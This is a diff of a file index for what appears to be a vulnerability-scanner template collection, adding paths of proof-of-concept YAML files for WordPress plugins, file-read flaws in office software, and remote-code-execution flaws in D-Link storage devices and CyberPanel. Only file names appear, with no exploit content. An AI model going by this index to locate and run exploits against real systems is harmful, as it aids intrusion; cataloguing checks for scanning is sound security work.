@@ -88416,6 +88639,8 @@ ./poc/other/builderchild-depot.yaml ./poc/other/builderchild-market.yaml ./poc/other/buildkite.yaml +./poc/other/buk-appointments-ae0876cbc8a6ea5bc63f81816ddd03a6.yaml +./poc/other/bukza-1d18f7cdcaadc800f7e99e165e820759.yaml ./poc/other/bulk-add-to-cart-xforwc-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/bulk-add-to-cart-xforwc-e7d05b0a2c85ee1ade7bf5ca69c912bf.yaml ./poc/other/bulk-add-to-cart-xforwc.yaml @@ -88490,6 +88715,7 @@ ./poc/other/bulk-resize-media-9e1541d38c8eaeed6eca5dee15217ad6.yaml ./poc/other/bulk-resize-media.yaml ./poc/other/bulk-role-change-2184325438ba670b61cd9b6f6df928fc.yaml +./poc/other/bulk-role-change.yaml ./poc/other/bulkpress-6cab963b9de4b9d0323f414bcf6ecfb7.yaml ./poc/other/bulkpress.yaml ./poc/other/bulletin-announcements-46b8a362033c2880d378a1a49beddfca.yaml @@ -89165,6 +89391,7 @@ ./poc/other/caxton.yaml ./poc/other/cb-logo-slider-6fc89698423781c51940a6f041af1e11.yaml ./poc/other/cb-logo-slider-c1c57bce6e7abc05a41314004b296fc2.yaml +./poc/other/cb-logo-slider.yaml ./poc/other/cbcurrencyconverter-ee2537008d80f69614315dff861d34fe.yaml ./poc/other/cbcurrencyconverter.yaml ./poc/other/cbi-referral-manager-61e01ca7d9166bfdf492f99d67a592e9.yaml @@ -90410,6 +90637,7 @@ ./poc/other/companion-auto-update-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/companion-auto-update-plugin.yaml ./poc/other/companion-auto-update.yaml +./poc/other/companion-portfolio-99848fed06847f56568685ec4d7abf53.yaml ./poc/other/companion-sitemap-generator-4a250ab8c94cb782214f7ebd60a04499.yaml ./poc/other/companion-sitemap-generator-77988317f5b0e9fe57b9da5469272d7b.yaml ./poc/other/companion-sitemap-generator-90a7930451947b64d95d162d4a52f512.yaml 
@@ -90493,6 +90721,7 @@ ./poc/other/coneblog-widgets-ec4fe1cabb457f15256813e0e7ad1522.yaml ./poc/other/coneblog-widgets.yaml ./poc/other/conking-schoolgroup.yaml +./poc/other/connatix-video-embed-078fbbdf831b8258d6e8b451d9e7fb0e.yaml ./poc/other/connect-proxy.yaml ./poc/other/connect.yaml ./poc/other/connect_secure.yaml @@ -91384,6 +91613,7 @@ ./poc/other/craft-blog-236bed5b5a49a6173251e991d6ca44d1.yaml ./poc/other/craft-blog-d2a46afd6d61289094ec49e6cf79a7c7.yaml ./poc/other/craft-blog.yaml +./poc/other/crafthemes-demo-import-3d9ed4f73a1e8e89ff28ad42207f57cc.yaml ./poc/other/crafthemes-demo-import-c9afed6fd882eb289857b169e53bcf2b.yaml ./poc/other/crafthemes-demo-import.yaml ./poc/other/craw-data-a12ef7ae6072663c7d8126b335e31950.yaml @@ -92287,6 +92517,7 @@ ./poc/other/deshang-dsmall.yaml ./poc/other/design-approval-system.yaml ./poc/other/designer-7fce07176e5a99557088287ca81287a3.yaml +./poc/other/designer.yaml ./poc/other/designexo-157cf14a019f2f39567d396451ba436d.yaml ./poc/other/designexo-7882c02d98b5026004752dc9f1ff36bf.yaml ./poc/other/designexo-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -93044,6 +93275,7 @@ ./poc/other/ds_store-7119.yaml ./poc/other/ds_store.yaml ./poc/other/dsdownloadlist-563c0ddc96003b5bd029f38391d35cf2.yaml +./poc/other/dsdownloadlist.yaml ./poc/other/dse855.yaml ./poc/other/dsgvo-youtube-ab2720de0d52a7fa9590416e9523d9f9.yaml ./poc/other/dsgvo-youtube.yaml @@ -94821,6 +95053,7 @@ ./poc/other/evarisk-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/evarisk-plugin.yaml ./poc/other/evarisk.yaml +./poc/other/eveeno-57163addaabbee05984ca77e6d31881e.yaml ./poc/other/event-277e8d56fcc68c4b904b4c6797f4ff1a.yaml ./poc/other/event-calendar-wd-69b87bae465fb82052727592fcbbe735.yaml ./poc/other/event-calendar-wd-877cd82fe3e9375676ea8b83397686a1.yaml 
@@ -95551,6 +95784,7 @@ ./poc/other/fat-rat-collect.yaml ./poc/other/fat-services-booking-563fc2c8504016145619f4efef5821c6.yaml ./poc/other/fat-services-booking-b49b9540b1d61d0bb6646887776106fb.yaml +./poc/other/fat-services-booking.yaml ./poc/other/fatal-error-notify-4a20fe7df5a09e585c3fd29c87c93761.yaml ./poc/other/fatal-error-notify-beeb4a2f62cdc2511279a3069cd288ec.yaml ./poc/other/fatal-error-notify-c90c028a9c10e24d0650366923ed951b.yaml @@ -96178,6 +96412,7 @@ ./poc/other/fluentform-4d296b89af0753bd8b0006f1d8fb0707.yaml ./poc/other/fluentform-5a4f1d1335206be59253794aca5ea37a.yaml ./poc/other/fluentform-5afefafeffe78d68ca3029397b2c2a37.yaml +./poc/other/fluentform-73d12813260178303738b5378f138bfb.yaml ./poc/other/fluentform-74266f76b31cec8437470fd5003d94c7.yaml ./poc/other/fluentform-7a194261443314036f826412dad99fb1.yaml ./poc/other/fluentform-89fc5d9942562cda921b9b436fa13433.yaml @@ -96868,6 +97103,7 @@ ./poc/other/full-page-blog-designer-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/full-page-blog-designer.yaml ./poc/other/full-screen-page-background-image-slideshow-6def5bf7385a589549cc6977b19eb2ae.yaml +./poc/other/full-screen-page-background-image-slideshow.yaml ./poc/other/full-site-editing-24836cca8d46e399082ff66df1b9f2f5.yaml ./poc/other/full-site-editing.yaml ./poc/other/fullscreen-galleria-667d8a4d3d1ada2f02cda7769b0c26df.yaml @@ -97158,6 +97394,7 @@ ./poc/other/ganglia-xml-grid-monitor-7574.yaml ./poc/other/ganglia-xml-grid-monitor.yaml ./poc/other/ganglia.yaml +./poc/other/ganohrs-toggle-shortcode-9c361274065595fa7c1b34cfc52539a1.yaml ./poc/other/gantry-26331f1e23aa3cae2c716a0d19223272.yaml ./poc/other/gantry-8355d258c5013eab39c370d8a445bea5.yaml ./poc/other/gantry-d41d8cd98f00b204e9800998ecf8427e.yaml 
@@ -97356,6 +97593,7 @@
 ./poc/other/get-hotfix.yaml
 ./poc/other/get-iam-users.yaml
 ./poc/other/get-override-sni.yaml
+./poc/other/get-post-content-shortcode-b22e11dd16a8eba4c44d1ec8159b3556.yaml
 ./poc/other/get-query-string.yaml
 ./poc/other/get-site-to-phone-by-qr-code-53f9f187ffc31e706ad6ef27544d8f05.yaml
 ./poc/other/get-site-to-phone-by-qr-code.yaml
@@ -97622,6 +97860,7 @@
 ./poc/other/globe-gateway-e4.yaml
 ./poc/other/glodon-console.yaml
 ./poc/other/glodon-linkworks-getuserxml4geps-infoleak.yaml
+./poc/other/glomex-oembed-2234b2001bef09d3310372cf737d335d.yaml
 ./poc/other/gloriatv.yaml
 ./poc/other/glorious-services-support-ff9293ba28748efa2ab9a2fe77385468.yaml
 ./poc/other/glorious-services-support.yaml
@@ -97655,6 +97894,7 @@
 ./poc/other/gmap-embed.yaml
 ./poc/other/gmap-point-list.yaml
 ./poc/other/gmw-premium-settings-dd2bed6814a3bf62f3d77a7f20807d63.yaml
+./poc/other/gmw-premium-settings.yaml
 ./poc/other/gn-publisher-ed64a3bb268d993879bfe6d851cf3187.yaml
 ./poc/other/gn-publisher.yaml
 ./poc/other/gnome-extensions.yaml
@@ -98293,6 +98533,7 @@
 ./poc/other/hello-elementor-4871f7fef9821ad7021876ca49006f78.yaml
 ./poc/other/hello-elementor.yaml
 ./poc/other/hello-in-all-languages-b021d6b8c28aeac89d4ee418f75211e9.yaml
+./poc/other/hello-in-all-languages.yaml
 ./poc/other/hello-world-d231240ada94c5c8cbcc13bfa66f2525.yaml
 ./poc/other/hello-world.yaml
 ./poc/other/helloprint-34e41f309c98caf99baeb7f290643ca1.yaml
@@ -98431,6 +98672,7 @@
 ./poc/other/hitron-technologies-7962.yaml
 ./poc/other/hitron-technologies.yaml
 ./poc/other/hits-counter-cc939d1b6fabefd87c8b2ff2ea159694.yaml
+./poc/other/hits-counter.yaml
 ./poc/other/hitsteps-visitor-manager-a4f14bcf46b90bf05fd86abc01d72e3e.yaml
 ./poc/other/hitsteps-visitor-manager-fc2fce71ebba70ebb2a3e464a40cd489.yaml
 ./poc/other/hitsteps-visitor-manager.yaml
@@ -99336,6 +99578,7 @@
 ./poc/other/imperial-fairytale-theme.yaml
 ./poc/other/imperial-fairytale.yaml
 ./poc/other/import-csv-files.yaml
+./poc/other/import-eventbrite-events-fbff3ca801016ea3ccdd49c17eb80e43.yaml
 ./poc/other/import-external-images-9273f54c8ffd0f68faff3d0f499be1c5.yaml
 ./poc/other/import-external-images.yaml
 ./poc/other/import-legacy-media-67f149250550d8d33d307cab4d57c82b.yaml
@@ -100245,11 +100488,13 @@
 ./poc/other/jigsaw.yaml
 ./poc/other/jinhe-oa-c6-download-file-read.yaml
 ./poc/other/jinheOA-c6-Anyfile-Read.yaml
+./poc/other/jinher-JC6-oaplusrangedownloadfile-filedownload.yaml
 ./poc/other/jinher-oa-c6-download-file-read.yaml
 ./poc/other/jinher_OA_fileread.yaml
 ./poc/other/jitsi-meet-8342.yaml
 ./poc/other/jitsi-meet-8343.yaml
 ./poc/other/jitsi-meet.yaml
+./poc/other/jiusi-oa-dl-fileread.yaml
 ./poc/other/jiusi-oa.yaml
 ./poc/other/jiusi_oa_wap_fileread.yaml
 ./poc/other/jive-sbs.yaml
@@ -100400,6 +100645,7 @@
 ./poc/other/jquery-collapse-o-matic-de7fa514ed9b21773bf9bc851ef2b923.yaml
 ./poc/other/jquery-collapse-o-matic.yaml
 ./poc/other/jquery-manager-3367ea01f2088951cb342fb251d528dc.yaml
+./poc/other/jquery-manager.yaml
 ./poc/other/jquery-news-ticker-69744f50cb3b95e3866ba8aeb7605b95.yaml
 ./poc/other/jquery-news-ticker-c49c40f42bc43c6794ed78edc107a82d.yaml
 ./poc/other/jquery-news-ticker.yaml
@@ -100710,6 +100956,7 @@
 ./poc/other/kingdee-oa-apusic-dirlist.yaml
 ./poc/other/kingdee-oa-serverfile-dirlist.yaml
 ./poc/other/kingdee.yaml
+./poc/other/kingdee_eas_pdfViewLocal_fileread.yaml
 ./poc/other/kingdee产品.yaml
 ./poc/other/kingosoft.yaml
 ./poc/other/kings-tab-slider-87759ecd3c5abd20fb071fecef1b0643.yaml
@@ -100722,6 +100969,7 @@
 ./poc/other/kingsoft-v8-fileread.yaml
 ./poc/other/kingsoft-v8-get-file-content-file-read.yaml
 ./poc/other/kingsoft_antivirus.yaml
+./poc/other/kingview-KingPortal-img-fileread.yaml
 ./poc/other/kinpan-wechat-getsysteminfo-fileread.yaml
 ./poc/other/kio_firmware.yaml
 ./poc/other/kioken-blocks-ff9293ba28748efa2ab9a2fe77385468.yaml
@@ -100806,6 +101054,7 @@
 ./poc/other/ko-fi-button-9325aa24d072619f5651560e247384bb.yaml
 ./poc/other/ko-fi-button.yaml
 ./poc/other/ko-fi.yaml
+./poc/other/koalendar-free-booking-widget-ce4441524b592e785043e6070388f53a.yaml
 ./poc/other/kodak-network-panel.yaml
 ./poc/other/kodcloud-system.yaml
 ./poc/other/kodex-posts-likes-45e6993ba544590f694f6722fa3e7ded.yaml
@@ -100865,6 +101114,7 @@
 ./poc/other/kraken-image-optimizer-8ef92c244ea084d34d3e77779f862441.yaml
 ./poc/other/kraken-image-optimizer-e178ea8a276e641fa36d4631642d4084.yaml
 ./poc/other/kraken-image-optimizer.yaml
+./poc/other/kredeum-nfts-63e1fa011074b96657eb8fc01827c46b.yaml
 ./poc/other/kuaipu-m6.yaml
 ./poc/other/kube-state-metrics.yaml
 ./poc/other/kubelet-healthz-8518.yaml
@@ -101790,6 +102040,7 @@
 ./poc/other/logo-slider.yaml
 ./poc/other/logs-de-connexion-d7d23b155dfaa3a988d72e6127ed152e.yaml
 ./poc/other/logs-de-connexion-f85b384f28b3064f6cddcd3aea6c849b.yaml
+./poc/other/logs-de-connexion.yaml
 ./poc/other/logsign-siem.yaml
 ./poc/other/lokalise.yaml
 ./poc/other/lokalyze-call-now-fc31f34f1e7eb5532b8cee2cef1220e7.yaml
@@ -104495,6 +104746,7 @@
 ./poc/other/newsmag-e9d5168a26b888c732e45e101b7446e7.yaml
 ./poc/other/newsmag-f3f203d9ab101f9d04ccf12ec6b5d164.yaml
 ./poc/other/newsmag.yaml
+./poc/other/newsmanapp.yaml
 ./poc/other/newsmash-40bc3abb5400677523e2ad7a6261fa5e.yaml
 ./poc/other/newsmash-6377f947dc4cbd6377b900e7b2a109af.yaml
 ./poc/other/newsmash.yaml
@@ -104516,6 +104768,7 @@
 ./poc/other/newspack-newsletters-4f9999690c698581a845ad28f4a49bf8.yaml
 ./poc/other/newspack-newsletters.yaml
 ./poc/other/newspack-plugin-9379b5458873ca8a838af45b061cf132.yaml
+./poc/other/newspack-plugin.yaml
 ./poc/other/newspack-popups-a34c5e958edc8f07b0a33b04a4a7ac46.yaml
 ./poc/other/newspack-popups.yaml
 ./poc/other/newspaper-00f6665d6f319be9e02a942aa6e540c2.yaml
@@ -104843,6 +105096,7 @@
 ./poc/other/note.yaml
 ./poc/other/notebook.yaml
 ./poc/other/notibar-6a67eeac174695863f49cd0d3c96e4de.yaml
+./poc/other/notibar.yaml
 ./poc/other/notice-bar-fd5c26d13188a474f8a36443321259dc.yaml
 ./poc/other/notice-bar.yaml
 ./poc/other/notice-board-cc874ba3ea9c2c7947f3b19596262c88.yaml
@@ -105207,6 +105461,7 @@
 ./poc/other/oopspam-anti-spam-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/oopspam-anti-spam.yaml
 ./poc/other/ootb-openstreetmap-ebbdd7982d7cfbc5d8fdcc7fb1338a5e.yaml
+./poc/other/ootb-openstreetmap.yaml
 ./poc/other/op5-monitor.yaml
 ./poc/other/opal-estate-0dcb54302d1cbc14744921bfe49d6ec9.yaml
 ./poc/other/opal-estate-83c55a4f4dacc2f4f75cffb02185b669.yaml
@@ -106508,6 +106763,7 @@
 ./poc/other/plainview-activity-monitor.yaml
 ./poc/other/planet-estream-panel.yaml
 ./poc/other/planning-center-online-giving-2b8dc9f317fc89f600c6ff394da3f60b.yaml
+./poc/other/planning-center-online-giving.yaml
 ./poc/other/plasma-malware.yaml
 ./poc/other/platform-494affd308ccb8e7d64ed1c53e59c3e9.yaml
 ./poc/other/platform-7b06cc5209762854414b3c68c84c38ec.yaml
@@ -106580,6 +106836,7 @@
 ./poc/other/plesk-stat.yaml
 ./poc/other/plexx-elementor-extension-bc97d41674ed9373912c496ad23df944.yaml
 ./poc/other/plexx-elementor-extension.yaml
+./poc/other/plezi-4a635b36fc2f020e6e97470ee9033e55.yaml
 ./poc/other/plezi-4a80cd5a954b8f2bb72aeed6f12b185b.yaml
 ./poc/other/plezi.yaml
 ./poc/other/plg_novana-1c2cea013210e5c90b176a13485e2663.yaml
@@ -107174,6 +107431,7 @@
 ./poc/other/post-to-csv-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/post-to-csv-plugin.yaml
 ./poc/other/post-to-csv.yaml
+./poc/other/post-to-pdf-8ab47ff832f5f5cf5ba543f690973fee.yaml
 ./poc/other/post-type-archive-mapping-2048e7d39b225ecdc11a2ee2d7255ab3.yaml
 ./poc/other/post-type-archive-mapping-ee3c52d95babeb4141d73dea29ec18e7.yaml
 ./poc/other/post-type-archive-mapping.yaml
@@ -107189,6 +107447,7 @@
 ./poc/other/post-type-x-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/post-type-x-plugin.yaml
 ./poc/other/post-type-x.yaml
+./poc/other/post-types-carousel-slider-c7b7350193feff134087fae14530c8a3.yaml
 ./poc/other/post-types-order.yaml
 ./poc/other/post-views-24abd907ffd64580d7c943b12c674d4c.yaml
 ./poc/other/post-views-c6d12eac9a2ed5430c292a57d46c13c2.yaml
@@ -107251,6 +107510,7 @@
 ./poc/other/postmessage-tracker.yaml
 ./poc/other/postmessage.yaml
 ./poc/other/postnews.yaml
+./poc/other/posts-and-products-views-6353d59c8166d0c7835a56c9603f6772.yaml
 ./poc/other/posts-and-users-stats-0ab172d4ca9582c8fe74d25d5316a728.yaml
 ./poc/other/posts-and-users-stats.yaml
 ./poc/other/posts-filter.yaml
@@ -107517,6 +107777,7 @@
 ./poc/other/prime-mover-7be4a5d85c0be6b79c9fd75d603a61da.yaml
 ./poc/other/prime-mover.yaml
 ./poc/other/primer-mydata-375188c0b0a50f100d36b48b3521edda.yaml
+./poc/other/primer-mydata.yaml
 ./poc/other/print-my-blog-07d0b9eba83ac3bc99e70879809b2161.yaml
 ./poc/other/print-my-blog-0d60b839fe53b91ff4cd23a37a41ac2d.yaml
 ./poc/other/print-my-blog-16b2944c04b2e609c30ed7f0804ad8ff.yaml
@@ -107669,6 +107930,7 @@
 ./poc/other/production-logs-9664.yaml
 ./poc/other/production-logs-9665.yaml
 ./poc/other/production-logs.yaml
+./poc/other/products-stock-manager-with-excel.yaml
 ./poc/other/profense-firewall.yaml
 ./poc/other/profile-builder-06648f9e075615ca43176d0be5873808.yaml
 ./poc/other/profile-builder-09b09edeeb14a032955a996c9b7890ff.yaml
@@ -107818,6 +108080,7 @@
 ./poc/other/property-hive-mortgage-calculator-c760bbdc9bdcea05982c5bd90d16aa7b.yaml
 ./poc/other/property-hive-mortgage-calculator.yaml
 ./poc/other/property-hive-stamp-duty-calculator-16a9af1f4a5d2ccf56de55248353c80f.yaml
+./poc/other/property-hive-stamp-duty-calculator.yaml
 ./poc/other/propertyhive-037af55d6e8601eb539d4a293f2c7429.yaml
 ./poc/other/propertyhive-213fa11c4bf7a8da59d186bd55b54ba6.yaml
 ./poc/other/propertyhive-2960a525cbf962ede729aef65425d76d.yaml
@@ -109375,6 +109638,7 @@
 ./poc/other/revslider.yaml
 ./poc/other/revy-495c6c691b0c18d8639b2352902ab78e.yaml
 ./poc/other/revy-97d9157afa2e36b24297da5e222a765b.yaml
+./poc/other/revy.yaml
 ./poc/other/rezgo-26bcf3f897bab277c32fe85f1493ee87.yaml
 ./poc/other/rezgo-58d7619a08af07091de0a1f004b3ffbf.yaml
 ./poc/other/rezgo-97ad3e6e2bcf0df0bbed78fdfd1954d0.yaml
@@ -109648,6 +109912,7 @@
 ./poc/other/royalevent-management-panel.yaml
 ./poc/other/rpcbind-portmapper.yaml
 ./poc/other/rrdevs-for-elementor-205fba8fcfa128a4dd45c5c816b0bc58.yaml
+./poc/other/rrdevs-for-elementor.yaml
 ./poc/other/rs-members-87dc2cb96f427a4fa87cb5cd585347cf.yaml
 ./poc/other/rs-members.yaml
 ./poc/other/rsa-self-service-9910.yaml
@@ -110781,6 +111046,7 @@
 ./poc/other/shortcode-bootstrap-visuals.yaml
 ./poc/other/shortcode-collection-1a24724444a0ce58a48ac7d26c93a67e.yaml
 ./poc/other/shortcode-collection.yaml
+./poc/other/shortcode-elementor-31466df2cf677a943b18b87d140554bf.yaml
 ./poc/other/shortcode-factory-bb8c7d13ad5dab028e9d0d3a3d2621e1.yaml
 ./poc/other/shortcode-factory.yaml
 ./poc/other/shortcode-for-current-date-85546a26d851f796e7037706c76d8989.yaml
@@ -111219,6 +111485,7 @@
 ./poc/other/simple-local-avatars-928d72ad44844b77d7135481b3a08e1d.yaml
 ./poc/other/simple-local-avatars-a6c25ebb693343456025e35b71df1fed.yaml
 ./poc/other/simple-local-avatars.yaml
+./poc/other/simple-locator-64cca06d1166ced2ac235d17d2f88e70.yaml
 ./poc/other/simple-long-form-3cc0cac5f345be7226ac380ec33c94e0.yaml
 ./poc/other/simple-long-form.yaml
 ./poc/other/simple-mail-address-encoder.yaml
@@ -111924,6 +112191,7 @@
 ./poc/other/smart-mockups-b1f443189eb688858fd0760beeec94dd.yaml
 ./poc/other/smart-mockups.yaml
 ./poc/other/smart-popup-blaster-30df007059118a37ebbef148c110f5c7.yaml
+./poc/other/smart-popup-blaster-38242ca08bf2b38877007cc96b7c92a1.yaml
 ./poc/other/smart-popup-blaster.yaml
 ./poc/other/smart-recent-posts-widget-d88f3f455f89003fa5734c525e70e76b.yaml
 ./poc/other/smart-recent-posts-widget.yaml
@@ -113263,6 +113531,7 @@
 ./poc/other/svg-complete-9a00f88d5bc565ed948caf11dc5530b8.yaml
 ./poc/other/svg-complete.yaml
 ./poc/other/svg-flags-lite.yaml
+./poc/other/svg-shortcode.yaml
 ./poc/other/svg-support-10450f9513d12ac69ea3bb6965c90ce1.yaml
 ./poc/other/svg-support-2111a4f5665d081b6a00c0712b17ce49.yaml
 ./poc/other/svg-support-8737608367f730b35c2f865cc5227ba0.yaml
@@ -113310,6 +113579,7 @@
 ./poc/other/swatchly-93343aa0a2403cba1031441b0dd98003.yaml
 ./poc/other/swatchly.yaml
 ./poc/other/sweetdate-e5542b1b90e04f838a674478f1ae9a52.yaml
+./poc/other/sweetdate.yaml
 ./poc/other/sweetrice.yaml
 ./poc/other/swift-framework-1c90a46c7aa619f2f432c73c82e79d4f.yaml
 ./poc/other/swift-framework-30d3f5776ed35230993fad52196a3d03.yaml
@@ -113498,6 +113768,7 @@
 ./poc/other/taboola.yaml
 ./poc/other/tabs-for-visual-composer-7c24bcf8b3fe76d313191f1003581a90.yaml
 ./poc/other/tabs-for-visual-composer.yaml
+./poc/other/tabs-maker-daf9e2cf38c5806dd492be7fef17b720.yaml
 ./poc/other/tabs-pro-07c3e9f28b3b9a38cbe150ab5e295ae3.yaml
 ./poc/other/tabs-pro.yaml
 ./poc/other/tabs-responsive-b0eeadcb7d7ab536f40c20fe22b3eecc.yaml
@@ -113611,6 +113882,7 @@
 ./poc/other/tbk-dvr.yaml
 ./poc/other/tc-team-members-bd0b9b57a9e173e1e14b3ac0d64104a6.yaml
 ./poc/other/tc-team-members.yaml
+./poc/other/tcbd-popover-cde275ba1470f5ed86bd89d6dd9707b4.yaml
 ./poc/other/tcexam.yaml
 ./poc/other/tcp.yaml
 ./poc/other/td-cloud-library-1c4748f99f4bb0e2e425c3b000b9c0fc.yaml
@@ -113950,6 +114222,7 @@
 ./poc/other/the-pack-addon-9d65c45870447c8e1f574c9405c1c538.yaml
 ./poc/other/the-pack-addon-ec4204d732428a733d159f17edf497a0.yaml
 ./poc/other/the-pack-addon.yaml
+./poc/other/the-permalinker-89aed934f46868a1f2162bc8d7aacc36.yaml
 ./poc/other/the-plus-addons-for-block-editor-3fac6ec605435f133e033d04209d4a06.yaml
 ./poc/other/the-plus-addons-for-block-editor-403b4c18c02de4a160946d81932cebc9.yaml
 ./poc/other/the-plus-addons-for-block-editor-781fc65c192e8902dacabb03e295f0ff.yaml
@@ -114156,6 +114429,7 @@
 ./poc/other/themify-shortcodes-4124d8eed93cc84547a536e1c9d94b5f.yaml
 ./poc/other/themify-shortcodes.yaml
 ./poc/other/themify-store-locator-e1393938516ee9ae32cd5a606ad5b4ae.yaml
+./poc/other/themify-store-locator.yaml
 ./poc/other/themify-ultra-5bc95c45748a3cd254e9770f26f620e3.yaml
 ./poc/other/themify-ultra-6e81b62d05c5b213c75bcd56b829bf41.yaml
 ./poc/other/themify-ultra-719858a7657f5c00d8b2f152c226b96c.yaml
@@ -114295,6 +114569,7 @@
 ./poc/other/tianqing-info-leak-10765.yaml
 ./poc/other/tianqing-info-leak.yaml
 ./poc/other/tianqing-info-leak.yml
+./poc/other/tianrongxin-TopSAG-download-download.yaml
 ./poc/other/tianyang-bpm-system.yaml
 ./poc/other/tibco-spotfire-panel.yaml
 ./poc/other/ticker-ultimate-7851c267c5129958224bd7b0d064e1e0.yaml
@@ -114304,6 +114579,7 @@
 ./poc/other/tickera-event-ticketing-system-3f231e7816388b1fe9e5517814166488.yaml
 ./poc/other/tickera-event-ticketing-system-44efbffc26c955fed37363f5648f1c78.yaml
 ./poc/other/tickera-event-ticketing-system-54b8e1a7f0e6f3064866cf634da7560f.yaml
+./poc/other/tickera-event-ticketing-system-5a3ee1f11c4a6d8e9eba3cf37c043750.yaml
 ./poc/other/tickera-event-ticketing-system-a4f1c86e3f8fdc5a0b0c583f5408977f.yaml
 ./poc/other/tickera-event-ticketing-system-d6d78415ab4cbc0ee457ea8ace304473.yaml
 ./poc/other/tickera-event-ticketing-system-f6c669de17f32256469c29f894a188e9.yaml
@@ -115668,6 +115944,7 @@
 ./poc/other/unlimited-popups-plugin.yaml
 ./poc/other/unlimited-popups.yaml
 ./poc/other/unlock-addons-for-elementor-3a1552c6c63a6565750f219a6bc5b9e2.yaml
+./poc/other/unlock-addons-for-elementor.yaml
 ./poc/other/unnamed-481779fee29d45847b5ad994dd1bc157.yaml
 ./poc/other/unnamed-se-481779fee29d45847b5ad994dd1bc157.yaml
 ./poc/other/unnamed-se.yaml
@@ -116557,6 +116834,7 @@
 ./poc/other/visualizer-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/visualizer-plugin.yaml
 ./poc/other/visualizer.yaml
+./poc/other/visualmodo-elements-134a8cc9ff775949b36d0becbb4ef51d.yaml
 ./poc/other/visualstudio.yaml
 ./poc/other/visualsvn-server.yaml
 ./poc/other/visualware-myconnection-server.yaml
@@ -116835,6 +117113,7 @@
 ./poc/other/wangguard.yaml
 ./poc/other/wangshen-file.yaml
 ./poc/other/wangyu-ssl-vpn.yaml
+./poc/other/wangyuxingyun_vpn_client_filedownload.yaml
 ./poc/other/wanhu-download-old-file-read.yaml
 ./poc/other/wanhu-ezoffice-download-fileread.yaml
 ./poc/other/wanhu-ezoffice-download-old-filedownload.yaml
@@ -117577,6 +117856,7 @@
 ./poc/other/woo-cart-abandonment-recovery-7dadc2d2ae314fd7bd464abf2969a4ea.yaml
 ./poc/other/woo-cart-abandonment-recovery.yaml
 ./poc/other/woo-cart-all-in-one.yaml
+./poc/other/woo-cart-count-shortcode-ba5e554357f7d9eec7e0e2ce4da9ba5f.yaml
 ./poc/other/woo-category-slider-by-pluginever-14963541d2314ab58423512ed4bb3c81.yaml
 ./poc/other/woo-category-slider-by-pluginever-55347e9ac58126992d50d45693e54288.yaml
 ./poc/other/woo-category-slider-by-pluginever-621a86ac69fc43f58c97e1a34ee9115f.yaml
@@ -117817,6 +118097,7 @@
 ./poc/other/woo-product-design.yaml
 ./poc/other/woo-product-enquiry-b4526b276b3e2e7c0402b23d28757087.yaml
 ./poc/other/woo-product-enquiry.yaml
+./poc/other/woo-product-excel-importer.yaml
 ./poc/other/woo-product-feed-pro-05841ed67452b0e539ead75c4b08efdc.yaml
 ./poc/other/woo-product-feed-pro-34a31aab7c05fc1a6c61c6a8ed5fc249.yaml
 ./poc/other/woo-product-feed-pro-375f6b2e208ed8fa03b50c0612a67cf9.yaml
@@ -118292,6 +118573,7 @@
 ./poc/other/worth-the-read-621a86ac69fc43f58c97e1a34ee9115f.yaml
 ./poc/other/worth-the-read.yaml
 ./poc/other/wosign-ssl-cert.yaml
+./poc/other/wot-elementor-widgets.yaml
 ./poc/other/wowhead.yaml
 ./poc/other/wowonder-installer.yaml
 ./poc/other/wowrestro-5b0f70e6bd85e50d3573977e5e12a5ee.yaml
@@ -118721,12 +119003,14 @@
 ./poc/other/yml-for-yandex-market-f2c47051ee26491b6f34209d86d4bf15.yaml
 ./poc/other/yml-for-yandex-market-f4f7110eac52dea3f609dd027787a854.yaml
 ./poc/other/yml-for-yandex-market.yaml
+./poc/other/yongyou-BIP-getolapconnectionlist-infoleak.yaml
 ./poc/other/yongyou-ELTextFile.yaml
 ./poc/other/yongyou-changjietong-EFI.yaml
 ./poc/other/yongyou-eltextfile.yaml
 ./poc/other/yongyou-fileRead.yaml
 ./poc/other/yongyou-u8-crm-fileread-getemaildata.yaml
 ./poc/other/yonyou nc协同-oa管理软件 v5.1sp1.yaml
+./poc/other/yonyou-UFIDA-NC-download-fileread.yaml
 ./poc/other/yonyou-chanjet-tplus-downloadproxy-filedownload.yaml
 ./poc/other/yonyou-chanjet-tplus-getdecallusers-infoleak.yaml
 ./poc/other/yonyou-chanjet-tplus-read-file.yaml
@@ -120204,6 +120488,8 @@
 ./poc/remote_code_execution/CVE_RCE2-1.yaml
 ./poc/remote_code_execution/ClusterEngine-sysShell-rce.yaml
 ./poc/remote_code_execution/D-Link-rce-CVE-2024-3273.yaml
+./poc/remote_code_execution/D-Link_DNS-320-account_mgr-rce.yaml
+./poc/remote_code_execution/D-Link_DNS-320-scan_dsk-rce.yaml
 ./poc/remote_code_execution/DedeCMS-common.func.php-RCE.yaml
 ./poc/remote_code_execution/Digital-Signage-rce.yaml
 ./poc/remote_code_execution/E-Cology-rce.yaml
@@ -120426,6 +120712,7 @@
 ./poc/remote_code_execution/appmaker-woocommerce-mobile-app-manager-11da82ad472a7a1feeb0be4f66208210.yaml
 ./poc/remote_code_execution/appmaker-woocommerce-mobile-app-manager.yaml
 ./poc/remote_code_execution/ar-for-woocommerce-c4de0b2f08459711f843283164b2de85.yaml
+./poc/remote_code_execution/ar-for-woocommerce.yaml
 ./poc/remote_code_execution/aramex-shipping-woocommerce-1e2ec7b5ad1bde5997d8381a3b49e6ed.yaml
 ./poc/remote_code_execution/aramex-shipping-woocommerce.yaml
 ./poc/remote_code_execution/arbitrary-file-thinkphp-lang-rce.yaml
@@ -120748,6 +121035,7 @@
 ./poc/remote_code_execution/customize-my-account-for-woocommerce.yaml
 ./poc/remote_code_execution/cve_rce2-1(1).yaml
 ./poc/remote_code_execution/cyberpanel-rce.yaml
+./poc/remote_code_execution/cyberpanel-upgrademysqlstatus-rce.yaml
 ./poc/remote_code_execution/dahua-dss-zhihuixiaoyuan-s2_45-rce.yaml
 ./poc/remote_code_execution/dahua-eims-capture-handle-rce.yaml
 ./poc/remote_code_execution/dahua-icc-fastjson-rce.yaml
